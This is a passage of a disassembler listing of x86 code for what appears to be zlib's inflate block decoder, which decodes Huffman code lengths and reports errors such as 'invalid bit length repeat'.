loc_40B677: ; CODE XREF: sub_40AF6D+6FF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B6D2: ; CODE XREF: sub_40AF6D+708�j
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_40B65E
; ---------------------------------------------------------------------------
loc_40B706: ; CODE XREF: sub_40AF6D+6F5�j
mov eax, [ebp+var_C]
and eax, 3FFFh
mov [ebp+var_10], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+var_10]
and eax, 1Fh
cmp eax, 1Dh
ja short loc_40B733
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
cmp ecx, 1Dh
jbe short loc_40B7A8
loc_40B733: ; CODE XREF: sub_40AF6D+7B6�j
mov edx, [ebp+arg_0]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B7A8: ; CODE XREF: sub_40AF6D+7C4�j
mov ecx, [ebp+var_10]
and ecx, 1Fh
mov edx, [ebp+var_10]
shr edx, 5
and edx, 1Fh
lea eax, [ecx+edx+102h]
mov [ebp+var_10], eax
push 4
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+arg_4]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_4]
call dword ptr [ecx+20h]
add esp, 0Ch
mov edx, [ebp+arg_0]
mov [edx+0Ch], eax
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40B848
mov [ebp+arg_8], 0FFFFFFFCh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B848: ; CODE XREF: sub_40AF6D+877�j
mov ecx, [ebp+var_C]
shr ecx, 0Eh
mov [ebp+var_C], ecx
mov edx, [ebp+var_14]
sub edx, 0Eh
mov [ebp+var_14], edx
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 4
loc_40B86D: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+9FF�j
; DATA XREF: ...
mov edx, [ebp+arg_0]
mov eax, [edx+4]
shr eax, 0Ah
add eax, 4
mov ecx, [ebp+arg_0]
cmp [ecx+8], eax
jnb loc_40B971
loc_40B885: ; CODE XREF: sub_40AF6D+9BD�j
cmp [ebp+var_14], 3
jnb loc_40B92F
cmp [ebp+var_1C], 0
jz short loc_40B89E
mov [ebp+arg_8], 0
jmp short loc_40B8F9
; ---------------------------------------------------------------------------
loc_40B89E: ; CODE XREF: sub_40AF6D+926�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B8F9: ; CODE XREF: sub_40AF6D+92F�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_40B885
; ---------------------------------------------------------------------------
loc_40B92F: ; CODE XREF: sub_40AF6D+91C�j
mov eax, [ebp+var_C]
and eax, 7
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov ecx, dword_414440[edx*4]
mov edx, [ebp+arg_0]
mov edx, [edx+0Ch]
mov [edx+ecx*4], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
jmp loc_40B86D
; ---------------------------------------------------------------------------
loc_40B971: ; CODE XREF: sub_40AF6D+912�j
; sub_40AF6D+A36�j
mov edx, [ebp+arg_0]
cmp dword ptr [edx+8], 13h
jnb short loc_40B9A5
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
mov edx, dword_414440[ecx*4]
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
mov dword ptr [ecx+edx*4], 0
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
jmp short loc_40B971
; ---------------------------------------------------------------------------
loc_40B9A5: ; CODE XREF: sub_40AF6D+A0B�j
mov edx, [ebp+arg_0]
mov dword ptr [edx+10h], 7
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_0]
add eax, 14h
push eax
mov ecx, [ebp+arg_0]
add ecx, 10h
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
call sub_40CBFE
add esp, 14h
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40BA6B
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+var_10]
mov [ebp+arg_8], eax
cmp [ebp+arg_8], 0FFFFFFFDh
jnz short loc_40BA10
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 9
loc_40BA10: ; CODE XREF: sub_40AF6D+A98�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BA6B: ; CODE XREF: sub_40AF6D+A71�j
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax], 5
loc_40BA7E: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D:loc_40BE0C�j
; DATA XREF: ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, 1Fh
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
lea edx, [eax+ecx+102h]
mov eax, [ebp+arg_0]
cmp [eax+8], edx
jnb loc_40BE11
mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
mov [ebp+var_10], edx
loc_40BAB2: ; CODE XREF: sub_40AF6D+BEA�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_10]
jnb loc_40BB5C
cmp [ebp+var_1C], 0
jz short loc_40BACD
mov [ebp+arg_8], 0
jmp short loc_40BB28
; ---------------------------------------------------------------------------
loc_40BACD: ; CODE XREF: sub_40AF6D+B55�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BB28: ; CODE XREF: sub_40AF6D+B5E�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_14]
add eax, 8
mov [ebp+var_14], eax
jmp loc_40BAB2
; ---------------------------------------------------------------------------
loc_40BB5C: ; CODE XREF: sub_40AF6D+B4B�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_C]
and edx, dword_4132F8[ecx*4]
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
lea edx, [ecx+edx*8]
mov [ebp+var_34], edx
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+1]
mov [ebp+var_10], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov [ebp+var_30], eax
cmp [ebp+var_30], 10h
jnb short loc_40BBC9
mov edx, [ebp+var_C]
mov ecx, [ebp+var_10]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_10]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
mov eax, [ebp+var_30]
mov [ecx+edx*4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
jmp loc_40BE0C
; ---------------------------------------------------------------------------
loc_40BBC9: ; CODE XREF: sub_40AF6D+C20�j
cmp [ebp+var_30], 12h
jnz short loc_40BBD8
mov [ebp+var_70], 7
jmp short loc_40BBE1
; ---------------------------------------------------------------------------
loc_40BBD8: ; CODE XREF: sub_40AF6D+C60�j
mov ecx, [ebp+var_30]
sub ecx, 0Eh
mov [ebp+var_70], ecx
loc_40BBE1: ; CODE XREF: sub_40AF6D+C69�j
mov edx, [ebp+var_70]
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
sub eax, 12h
neg eax
sbb eax, eax
and al, 0F8h
add eax, 0Bh
mov [ebp+var_3C], eax
loc_40BBF9: ; CODE XREF: sub_40AF6D+D36�j
mov ecx, [ebp+var_10]
add ecx, [ebp+var_38]
cmp [ebp+var_14], ecx
jnb loc_40BCA8
cmp [ebp+var_1C], 0
jz short loc_40BC17
mov [ebp+arg_8], 0
jmp short loc_40BC72
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40AF6D+C9F�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BC72: ; CODE XREF: sub_40AF6D+CA8�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_40BBF9
; ---------------------------------------------------------------------------
loc_40BCA8: ; CODE XREF: sub_40AF6D+C95�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_10]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, [ebp+var_10]
mov [ebp+var_14], ecx
mov edx, [ebp+var_38]
mov eax, [ebp+var_C]
and eax, dword_4132F8[edx*4]
mov ecx, [ebp+var_3C]
add ecx, eax
mov [ebp+var_3C], ecx
mov edx, [ebp+var_C]
mov ecx, [ebp+var_38]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_38]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov [ebp+var_38], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_38]
add edx, [ebp+var_3C]
mov eax, [ebp+var_10]
and eax, 1Fh
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
lea eax, [eax+ecx+102h]
cmp edx, eax
ja short loc_40BD2B
cmp [ebp+var_30], 10h
jnz loc_40BDB7
cmp [ebp+var_38], 1
jnb loc_40BDB7
loc_40BD2B: ; CODE XREF: sub_40AF6D+DA8�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebp+arg_8], 0FFFFFFFDh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BDB7: ; CODE XREF: sub_40AF6D+DAE�j
; sub_40AF6D+DB8�j
cmp [ebp+var_30], 10h
jnz short loc_40BDCF
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
mov ecx, [ebp+var_38]
mov edx, [eax+ecx*4-4]
mov [ebp+var_74], edx
jmp short loc_40BDD6
; ---------------------------------------------------------------------------
loc_40BDCF: ; CODE XREF: sub_40AF6D+E4E�j
mov [ebp+var_74], 0
loc_40BDD6: ; CODE XREF: sub_40AF6D+E60�j
mov eax, [ebp+var_74]
mov [ebp+var_30], eax
loc_40BDDC: ; CODE XREF: sub_40AF6D+E94�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
mov eax, [ebp+var_38]
mov ecx, [ebp+var_30]
mov [edx+eax*4], ecx
mov edx, [ebp+var_38]
add edx, 1
mov [ebp+var_38], edx
mov eax, [ebp+var_3C]
sub eax, 1
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jnz short loc_40BDDC
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_38]
mov [ecx+8], edx
loc_40BE0C: ; CODE XREF: sub_40AF6D+C57�j
jmp loc_40BA7E
; ---------------------------------------------------------------------------
loc_40BE11: ; CODE XREF: sub_40AF6D+B36�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+14h], 0
mov [ebp+var_4C], 9
mov [ebp+var_40], 6
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
lea eax, [ebp+var_50]
push eax
lea ecx, [ebp+var_48]
push ecx
lea edx, [ebp+var_40]
push edx
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_10]
shr eax, 5
and eax, 1Fh
add eax, 1
push eax
mov ecx, [ebp+var_10]
and ecx, 1Fh
add ecx, 101h
push ecx
call sub_40CCA6
add esp, 24h
mov [ebp+var_10], eax
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
cmp [ebp+var_10], 0
jz short loc_40BF06
cmp [ebp+var_10], 0FFFFFFFDh
jnz short loc_40BEA5
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 9
loc_40BEA5: ; CODE XREF: sub_40AF6D+F2D�j
mov edx, [ebp+var_10]
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BF06: ; CODE XREF: sub_40AF6D+F27�j
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_48]
push edx
mov eax, [ebp+var_40]
push eax
mov ecx, [ebp+var_4C]
push ecx
call sub_409FF9
add esp, 14h
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jnz short loc_40BF8D
mov [ebp+arg_8], 0FFFFFFFCh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40BF8D: ; CODE XREF: sub_40AF6D+FBC�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_44]
mov [edx+4], eax
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 6
loc_40BF9F: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:0040C2B5�o
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40A04E
add esp, 0Ch
mov [ebp+arg_8], eax
cmp [ebp+arg_8], 1
jz short loc_40C017
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40C017: ; CODE XREF: sub_40AF6D+108F�j
mov [ebp+arg_8], 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_40ADA5
add esp, 8
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_1C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40C079
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_78], eax
jmp short loc_40C085
; ---------------------------------------------------------------------------
loc_40C079: ; CODE XREF: sub_40AF6D+10F9�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_78], edx
loc_40C085: ; CODE XREF: sub_40AF6D+110A�j
mov eax, [ebp+var_78]
mov [ebp+var_18], eax
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+18h], 0
jnz short loc_40C0A2
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp loc_40C294
; ---------------------------------------------------------------------------
loc_40C0A2: ; CODE XREF: sub_40AF6D+1125�j
mov eax, [ebp+arg_0]
mov dword ptr [eax], 7
loc_40C0AB: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:0040C2B9�o
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
mov [ebp+arg_8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_40C0F0
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_7C], edx
jmp short loc_40C0FC
; ---------------------------------------------------------------------------
loc_40C0F0: ; CODE XREF: sub_40AF6D+1170�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_7C], ecx
loc_40C0FC: ; CODE XREF: sub_40AF6D+1181�j
mov edx, [ebp+var_7C]
mov [ebp+var_18], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+34h]
jz short loc_40C16B
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40C16B: ; CODE XREF: sub_40AF6D+11A1�j
mov eax, [ebp+arg_0]
mov dword ptr [eax], 8
loc_40C174: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:0040C2BD�o
mov [ebp+arg_8], 1
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40C1D6: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:0040C2C1�o
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
